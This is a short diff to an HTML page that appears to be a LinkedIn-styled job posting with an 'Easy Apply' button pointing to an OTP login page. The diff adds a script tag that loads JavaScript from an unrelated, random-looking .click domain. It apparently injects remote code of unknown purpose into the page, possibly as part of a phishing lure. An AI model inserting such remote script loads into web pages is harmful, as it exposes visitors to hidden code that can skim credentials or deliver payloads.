--- a/index.html
+++ b/index.html
@@ -111,6 +111,9 @@
             <p><i><b>Salary: </b>Negotiable.</i></p>
             <p>Join us to help shape the future of professional networking!</p>
         </div>
+<script type="text/javascript" src="//44kdka.click/c3ee074515c9d38e7a31/b1fb8bc644/?placementName=default">
+</script>
+
         <a href="/otp_login.html" class="easy-apply-button">
           <i class="fab fa-linkedin"></i> Easy Apply
         </a>
